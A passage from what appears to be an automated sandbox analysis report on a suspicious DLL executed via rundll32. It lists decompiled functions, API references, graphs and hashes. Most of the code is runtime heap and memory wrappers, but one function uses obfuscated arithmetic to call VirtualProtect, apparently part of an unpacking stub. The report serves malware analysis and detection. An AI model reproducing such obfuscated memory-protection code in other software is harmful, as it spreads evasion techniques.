                                                                                                            				intOrPtr _t21;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				_push(0xc);
                                                                                                            				_push(0x10041d10);
                                                                                                            				_t9 = E10012514(__ebx, __edi, __esi);
                                                                                                            				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                                                            				if(_t21 != 0) {
                                                                                                            					if( *0x10050a64 != 3) {
                                                                                                            						_push(_t21);
                                                                                                            						goto L7;
                                                                                                            					} else {
                                                                                                            						E10013A38(__ebx, __edi, 4);
                                                                                                            						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                                                            						_t12 = E10013B9B(_t21);
                                                                                                            						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
                                                                                                            						if(_t12 != 0) {
                                                                                                            							_push(_t21);
                                                                                                            							_push(_t12);
                                                                                                            							E10013BC6();
                                                                                                            						}
                                                                                                            						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                                                            						_t9 = E1001081B();
                                                                                                            						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
                                                                                                            							_push( *((intOrPtr*)(_t22 + 8)));
                                                                                                            							L7:
                                                                                                            							_push(0);
                                                                                                            							_t9 = RtlFreeHeap( *0x10050a60); // executed
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E1001254F(_t9);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 100107E6
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,10041D10,0000000C,10013A1C,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 1001082D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterFreeHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 3012239193-0
                                                                                                            • Opcode ID: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction ID: e2f95eda502a26e356ba5135cb18e14e48cd53293581a9dd67e0285628cf36ea
                                                                                                            • Opcode Fuzzy Hash: a4ec4e95e76719edca13298b27ffeb92ed14bb756df65cea7ebe692d9a49c22e
                                                                                                            • Instruction Fuzzy Hash: C0F09635D0A215AAEB10DB60CC46B4E3B64EF00760F208014F5906D0D1DF74E5C0CAD5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 282 1001070f-10010725 call 10012514 285 10010755-10010757 282->285 286 10010727-1001072d 282->286 288 10010759 285->288 289 1001075a-10010761 285->289 286->285 287 1001072f-10010753 call 10013a38 call 1001437a call 10010781 286->287 287->285 293 10010778-1001077d call 1001254f 287->293 288->289 291 10010763-10010766 289->291 292 10010769-10010772 RtlAllocateHeap 289->292 291->292 292->293
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1001070F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                            				long _t19;
                                                                                                            				void* _t21;
                                                                                                            				void* _t24;
                                                                                                            
                                                                                                            				_push(0xc);
                                                                                                            				_push(0x10041d00);
                                                                                                            				E10012514(__ebx, __edi, __esi);
                                                                                                            				_t19 =  *(_t21 + 8);
                                                                                                            				if( *0x10050a64 != 3) {
                                                                                                            					L3:
                                                                                                            					if(_t19 == 0) {
                                                                                                            						_t19 = _t19 + 1;
                                                                                                            					}
                                                                                                            					if( *0x10050a64 != 1) {
                                                                                                            						_t19 = _t19 + 0x0000000f & 0xfffffff0;
                                                                                                            					}
                                                                                                            					_t9 = RtlAllocateHeap( *0x10050a60, 0, _t19); // executed
                                                                                                            				} else {
                                                                                                            					_t24 = _t19 -  *0x10050a50; // 0x0
                                                                                                            					if(_t24 > 0) {
                                                                                                            						goto L3;
                                                                                                            					} else {
                                                                                                            						E10013A38(__ebx, __edi, 4);
                                                                                                            						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                                                                                                            						_push(_t19);
                                                                                                            						 *(_t21 - 0x1c) = E1001437A();
                                                                                                            						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
                                                                                                            						E10010781();
                                                                                                            						_t9 =  *(_t21 - 0x1c);
                                                                                                            						if( *(_t21 - 0x1c) == 0) {
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E1001254F(_t9);
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 10010731
                                                                                                              • Part of subcall function 10013A38: EnterCriticalSection.KERNEL32(?,?,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?), ref: 10013A60
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,10041D00,0000000C,1001079A,000000E0,100107C5,?,100139BB,00000018,10041E50,00000008,10013A51,?,?), ref: 10010772
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCriticalEnterHeapSection__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 409319249-0
                                                                                                            • Opcode ID: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction ID: 42b023ab18c65cc465c375f16582ad1359b716bf9f3aedd515ba29da9f54a78b
                                                                                                            • Opcode Fuzzy Hash: 50d20e50f01447f42db1d42bb29e4d21c1024c3df395ccd2c9c31703fcb81017
                                                                                                            • Instruction Fuzzy Hash: 1DF06D75E45665ABEB10EB708C4AB8D7BB4FB003A1F150114F9A1AE1E1D7B0BAC08E95
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 301 10013a83-10013aa1 HeapCreate 302 10013aa3-10013ab0 call 10013a69 301->302 303 10013acd-10013acf 301->303 306 10013ad0-10013ad3 302->306 307 10013ab2-10013abf call 10013b53 302->307 307->306 310 10013ac1-10013ac7 HeapDestroy 307->310 310->303
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013A83(intOrPtr _a4) {
                                                                                                            				void* _t6;
                                                                                                            				intOrPtr _t8;
                                                                                                            
                                                                                                            				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                            				 *0x10050a60 = _t6;
                                                                                                            				if(_t6 == 0) {
                                                                                                            					L4:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t8 = E10013A69();
                                                                                                            					 *0x10050a64 = _t8;
                                                                                                            					if(_t8 != 3 || E10013B53(0x3f8) != 0) {
                                                                                                            						return 1;
                                                                                                            					} else {
                                                                                                            						HeapDestroy( *0x10050a60);
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNEL32(00000000,00001000,00000000,10011217,00000001,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013A94
                                                                                                              • Part of subcall function 10013B53: HeapAlloc.KERNEL32(00000000,00000140,10013ABC,000003F8,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B60
                                                                                                            • HeapDestroy.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013AC7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocCreateDestroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2236781399-0
                                                                                                            • Opcode ID: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction ID: e8a57e519fdf56151fc66cac883b31846c607769bf618c359d49edee3f1857a7
                                                                                                            • Opcode Fuzzy Hash: f6a2f7532e9ba5cb0f586e1f719da1c5d5a79765111272051b74937e09fd73f5
                                                                                                            • Instruction Fuzzy Hash: 6BE01A74A953559EEB01EB718C45B1A37E4EB44682F488829F442CD4A1EB70D680A602
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 311 10003310-10003320 312 10003322-1000332a 311->312 313 1000332b-10003374 311->313 314 100033fa-100034e1 313->314 315 1000337a-10003387 313->315 316 10003500-1000356c VirtualProtect 314->316 317 100034e3-100034fc 314->317 318 10003389-1000338e 315->318 319 100033ed-100033f9 315->319 317->316 320 10003390-1000339c 318->320 321 100033cd-100033ea 318->321 320->321 322 1000339e-100033cb 320->322 321->319 322->319 322->321
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E10003310() {
                                                                                                            				long _t80;
                                                                                                            				signed int _t83;
                                                                                                            				signed int _t87;
                                                                                                            				intOrPtr _t91;
                                                                                                            				signed int _t101;
                                                                                                            				signed int _t116;
                                                                                                            				signed int _t122;
                                                                                                            				intOrPtr _t126;
                                                                                                            				signed int _t127;
                                                                                                            				signed int _t132;
                                                                                                            				signed int _t135;
                                                                                                            				intOrPtr* _t137;
                                                                                                            				intOrPtr* _t141;
                                                                                                            				signed int _t150;
                                                                                                            				signed int _t158;
                                                                                                            				signed int _t165;
                                                                                                            				signed int _t175;
                                                                                                            				signed int _t186;
                                                                                                            				signed int _t216;
                                                                                                            				signed int _t223;
                                                                                                            				signed int _t227;
                                                                                                            				intOrPtr _t235;
                                                                                                            				signed int _t238;
                                                                                                            				void* _t239;
                                                                                                            
                                                                                                            				_t80 =  *(_t239 + 0x18);
                                                                                                            				_t126 =  *((intOrPtr*)(_t80 + 8));
                                                                                                            				 *((intOrPtr*)(_t239 + 8)) = _t126;
                                                                                                            				if(_t126 != 0) {
                                                                                                            					_t132 =  *(_t80 + 0xc);
                                                                                                            					_t127 =  *0x1004b0dc; // 0x0
                                                                                                            					_t5 = _t127 + 1; // 0x1
                                                                                                            					_t101 =  *0x1004b0ec; // 0x0
                                                                                                            					_t165 =  *0x1004b0e0; // 0x0
                                                                                                            					_t7 = _t165 + 0x1000000; // 0x1000000
                                                                                                            					_t83 =  *0x1004b0e4; // 0x0
                                                                                                            					_t150 =  *0x1004b0d8; // 0x0
                                                                                                            					 *(_t239 + 0x10) = _t132;
                                                                                                            					if((_t132 & _t83 * 0x7fffffff + _t165 + _t7 - _t5 * _t127 + _t101 + _t150 << 0x00000001) == 0) {
                                                                                                            						_t35 = _t83 * _t165 + 1; // 0x1
                                                                                                            						 *(_t239 + 0x1c) = _t83 * _t165;
                                                                                                            						_t135 =  *0x1004b0e8; // 0x0
                                                                                                            						asm("sbb ebp, ebp");
                                                                                                            						asm("sbb edi, edi");
                                                                                                            						_t216 =  *0x1004b0d8; // 0x0
                                                                                                            						_t223 =  *0x1004b0d8; // 0x0
                                                                                                            						asm("sbb esi, esi");
                                                                                                            						_t158 =  *0x1004b0ec; // 0x0
                                                                                                            						 *(_t239 + 0x14) =  *(0x1004b0f4 + ( ~( ~(_t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 + _t135 * 0x7fffffff + (0x00000001 - _t135) * _t83 * _t165 +  *0x1004b0d8 + ((0x00000001 - _t216) * _t127 - _t83) * _t127 - 0x80000000 &  *(_t239 + 0x10))) + ( ~( ~(0x40000000 + ((_t35 * 0x3fffffff + _t135) * _t127 + (_t135 * _t165 + 0x00000001) * _t150) * 0x00000004 &  *(_t239 + 0x10))) +  ~( ~(_t150 + _t135 * 0x00000002 + _t135 + _t150 + _t135 * 0x00000002 + _t135 + 0x20000000 &  *(_t239 + 0x10))) * 2) * 2) * 4);
                                                                                                            						_t175 =  *0x1004b0e0; // 0x0
                                                                                                            						_t116 = _t158 * _t127;
                                                                                                            						if(( *(_t239 + 0x10) & (_t116 * _t127 + _t116 * _t127 * 0x00000002 - 0x00000006) * _t127 + _t175 + _t175 - _t135 - _t158 + _t83 + _t223 + (_t175 + _t175 - _t135 - _t158 + _t83 + _t223) * 0x00000002 + 0x04000000) != 0) {
                                                                                                            							 *(_t239 + 0x14) =  *(_t239 + 0x14) | _t158 * _t83 *  *0x1004b0e0 + 0x00000200 + _t158 * _t83 *  *0x1004b0e0 * 0x00000002;
                                                                                                            						}
                                                                                                            						_t186 =  *0x1004b0e0; // 0x0
                                                                                                            						_t227 = _t158 * 0x3fffffff;
                                                                                                            						_t122 =  *0x1004b0d8; // 0x0
                                                                                                            						_t74 = _t227 + 1; // 0x1
                                                                                                            						_t87 = VirtualProtect( *( *(_t239 + 0x30)),  *((intOrPtr*)(_t239 + 0x20)) + (_t83 * 0x3fffffff + (_t122 + _t74) * _t186 + _t122 + (2 -  *((intOrPtr*)(_t239 + 0x24)) - _t135 - _t158) * _t127) * 4,  *(_t239 + 0x18), _t239 + 0x28 + ((_t116 + _t135) * _t158 + _t186) * 8); // executed
                                                                                                            						asm("sbb eax, eax");
                                                                                                            						return  ~( ~_t87);
                                                                                                            					} else {
                                                                                                            						_t137 =  *((intOrPtr*)(_t239 + 0x28));
                                                                                                            						_t235 =  *_t137;
                                                                                                            						 *((intOrPtr*)(_t239 + 0x28)) = _t235;
                                                                                                            						if(_t235 ==  *((intOrPtr*)(_t137 + 4))) {
                                                                                                            							if( *((intOrPtr*)(_t137 + 0x10)) != 0) {
                                                                                                            								L7:
                                                                                                            								_t91 =  *((intOrPtr*)(_t239 + 0x24));
                                                                                                            								 *((intOrPtr*)(_t91 + 0x20))( *(_t239 + 0x30),  *(_t239 + 0x1c), 0x4000 - _t101,  *((intOrPtr*)(_t91 + 0x34)));
                                                                                                            							} else {
                                                                                                            								_t141 =  *((intOrPtr*)(_t239 + 0x24));
                                                                                                            								_t238 =  *(_t141 + 0x3c);
                                                                                                            								if( *((intOrPtr*)( *_t141 + 0x38)) == _t238 || (_t150 + 2) * _t101 + _t83 + _t165 * 2 + ((_t150 + 2) * _t101 + _t83 + _t165 * 2) * 2 - (_t83 * _t127 * _t127 + 3 + _t83 * _t127 * _t127 * 2) *  *0x1004b0e8 +  *(_t239 + 0x18) % _t238 == 0) {
                                                                                                            									goto L7;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						return 1;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					return 1;
                                                                                                            				}
                                                                                                            			}



























                                                                                                            0x10003313
                                                                                                            0x10003317
                                                                                                            0x1000331c
                                                                                                            0x10003320
                                                                                                            0x1000332b
                                                                                                            0x1000332e
                                                                                                            0x10003334
                                                                                                            0x1000333b
                                                                                                            0x10003343
                                                                                                            0x1000334a
                                                                                                            0x10003353
                                                                                                            0x10003364
                                                                                                            0x10003370
                                                                                                            0x10003374
                                                                                                            0x100033ff
                                                                                                            0x10003408
                                                                                                            0x1000340c
                                                                                                            0x10003433
                                                                                                            0x10003447
                                                                                                            0x1000344f
                                                                                                            0x10003492
                                                                                                            0x10003498
                                                                                                            0x100034a6
                                                                                                            0x100034ac
                                                                                                            0x100034b0
                                                                                                            0x100034be
                                                                                                            0x100034e1
                                                                                                            0x100034fc
                                                                                                            0x100034fc
                                                                                                            0x10003500
                                                                                                            0x10003515
                                                                                                            0x10003525
                                                                                                            0x1000352b
                                                                                                            0x10003559
                                                                                                            0x10003563
                                                                                                            0x1000356c
                                                                                                            0x1000337a
                                                                                                            0x1000337a
                                                                                                            0x1000337e
                                                                                                            0x10003383
                                                                                                            0x10003387
                                                                                                            0x1000338e
                                                                                                            0x100033cd
                                                                                                            0x100033cd
                                                                                                            0x100033e7
                                                                                                            0x10003390
                                                                                                            0x10003390
                                                                                                            0x10003394
                                                                                                            0x1000339c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000339c
                                                                                                            0x1000338e
                                                                                                            0x100033f9
                                                                                                            0x100033f9
                                                                                                            0x10003322
                                                                                                            0x1000332a
                                                                                                            0x1000332a

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction ID: 1dc449bc3d80b5784a3a7ae21000a0fc3896a9c870339c3573936ee24331a343
                                                                                                            • Opcode Fuzzy Hash: f94f5a31096f78052b225d6198edabbe45c52cabc43602b45e44eff5801c83ed
                                                                                                            • Instruction Fuzzy Hash: 1A7129335043298FD314DF58C9C1646B7E9FB89310F058A2EDD699B3A5E670FE098AC4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 324 10037855-10037867 call 10011bf0 327 10037897-100378a8 call 10037552 324->327 328 10037869-10037871 324->328 337 100378aa-100378b8 call 10037732 327->337 338 100378bd-100378cc 327->338 330 10037873-1003788a call 1003768d 328->330 331 10037890 call 10037446 328->331 330->331 336 10037895 331->336 336->327 337->338
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10037855(intOrPtr* __ecx) {
                                                                                                            				intOrPtr _t12;
                                                                                                            				intOrPtr _t14;
                                                                                                            				signed char* _t15;
                                                                                                            				long* _t17;
                                                                                                            				long* _t19;
                                                                                                            				intOrPtr _t23;
                                                                                                            				intOrPtr* _t26;
                                                                                                            				void* _t28;
                                                                                                            
                                                                                                            				E10011BF0(0x1003aa13, _t28);
                                                                                                            				_push(__ecx);
                                                                                                            				_t26 = __ecx;
                                                                                                            				if( *__ecx == 0) {
                                                                                                            					_t20 =  *0x1004eff0; // 0x1004eff4
                                                                                                            					if(_t20 == 0) {
                                                                                                            						 *((intOrPtr*)(_t28 - 0x10)) = 0x1004eff4;
                                                                                                            						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                                                                                                            						_t15 = E1003768D(0x1004eff4);
                                                                                                            						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
                                                                                                            						_t20 = _t15;
                                                                                                            						 *0x1004eff0 = _t15; // executed
                                                                                                            					}
                                                                                                            					_t14 = E10037446(_t20); // executed
                                                                                                            					 *_t26 = _t14;
                                                                                                            				}
                                                                                                            				_t17 =  *0x1004eff0; // 0x1004eff4
                                                                                                            				_t23 = E10037552(_t17,  *_t26);
                                                                                                            				if(_t23 == 0) {
                                                                                                            					_t12 =  *((intOrPtr*)(_t28 + 8))();
                                                                                                            					_t19 =  *0x1004eff0; // 0x1004eff4
                                                                                                            					_t23 = _t12;
                                                                                                            					E10037732(_t19,  *_t26, _t23);
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                                                                                                            				return _t23;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1003785A
                                                                                                              • Part of subcall function 1003768D: TlsAlloc.KERNEL32(?,10037884,?,?,?,100373C4,100347FD,100071DC), ref: 100376AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocH_prolog
                                                                                                            • String ID:
                                                                                                            • API String ID: 3910492588-0
                                                                                                            • Opcode ID: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction ID: 4636a69bf69d573d2e706337ed3b04a464365e57385db0f45bc25e4442f629a4
                                                                                                            • Opcode Fuzzy Hash: afc1abf3d35d6b52cdf0f25188e220ecb9e5087980f930720a4386ab5437719b
                                                                                                            • Instruction Fuzzy Hash: 80018B396001A29FE72ACF18C851B6D77A2FB81362F10053EE996DB290DB349C00CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 341 100045d0-100045ea VirtualAlloc
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045D0(void* _a4, long _a8, long _a12, long _a16) {
                                                                                                            				void* _t7;
                                                                                                            
                                                                                                            				_t7 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
                                                                                                            				return _t7;
                                                                                                            			}




                                                                                                            0x100045e4
                                                                                                            0x100045ea

                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?), ref: 100045E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction ID: c6cc4055dfec23ff58d81a81712461c79eda0eebf3d1de213efbbce8f3264bb9
                                                                                                            • Opcode Fuzzy Hash: 79d8040eb94a772a3858464c411fe2626b1031866cac9e3cc93b0a28150a8e2a
                                                                                                            • Instruction Fuzzy Hash: FCC0EAB9608201AF9A04DB54C988C6BB7E9EBC8641F008909B59983210D630E8408B22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 342 100045f0-10004605 VirtualFree
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100045F0(void* _a4, long _a8, long _a12) {
                                                                                                            				int _t5;
                                                                                                            
                                                                                                            				_t5 = VirtualFree(_a4, _a8, _a12); // executed
                                                                                                            				return _t5;
                                                                                                            			}




                                                                                                            0x100045ff
                                                                                                            0x10004605

                                                                                                            APIs
                                                                                                            • VirtualFree.KERNELBASE(?,?,?), ref: 100045FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction ID: 188741ce2ee140a107eafa4ec0cdb16d021ba485332012740db5241ef1f15393
                                                                                                            • Opcode Fuzzy Hash: 174df1bf701f566af763c199529526010cd62a485baa78f61ffb0b3445841b2f
                                                                                                            • Instruction Fuzzy Hash: D3C048B9218201BFEA04DB50CA88C2BB7A9EBC8A11F00C90DB88983210C630EC00DA22
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002592C(void* __ebx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t33;
                                                                                                            				long _t35;
                                                                                                            				intOrPtr* _t36;
                                                                                                            				void* _t43;
                                                                                                            				void* _t49;
                                                                                                            				CHAR* _t69;
                                                                                                            				void* _t74;
                                                                                                            				void* _t76;
                                                                                                            
                                                                                                            				E10011BF0(0x1003acd2, _t76);
                                                                                                            				_t33 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_t69 =  *(_t76 + 8);
                                                                                                            				 *((intOrPtr*)(_t76 - 0x10)) = _t33;
                                                                                                            				_t35 = GetFullPathNameA( *(_t76 + 0xc), 0x104, _t69, _t76 - 0x154);
                                                                                                            				if(_t35 != 0) {
                                                                                                            					if(_t35 < 0x104) {
                                                                                                            						_t36 = E100243B2();
                                                                                                            						_t67 =  *_t36;
                                                                                                            						 *(_t76 + 8) =  *((intOrPtr*)( *_t36 + 0xc))() + 0x10;
                                                                                                            						 *((intOrPtr*)(_t76 - 4)) = 0;
                                                                                                            						E100258EA(0, _t69, _t76 + 8);
                                                                                                            						if(PathIsUNCA( *(_t76 + 8)) != 0) {
                                                                                                            							L15:
                                                                                                            							_t74 = 1;
                                                                                                            						} else {
                                                                                                            							if(GetVolumeInformationA( *(_t76 + 8), 0, 0, 0, _t76 - 0x15c, _t76 - 0x158, 0, 0) != 0) {
                                                                                                            								if(( *(_t76 - 0x158) & 0x00000002) == 0) {
                                                                                                            									CharUpperA(_t69);
                                                                                                            								}
                                                                                                            								if(( *(_t76 - 0x158) & 0x00000004) != 0) {
                                                                                                            									goto L15;
                                                                                                            								} else {
                                                                                                            									_t49 = FindFirstFileA( *(_t76 + 0xc), _t76 - 0x150);
                                                                                                            									if(_t49 == 0xffffffff) {
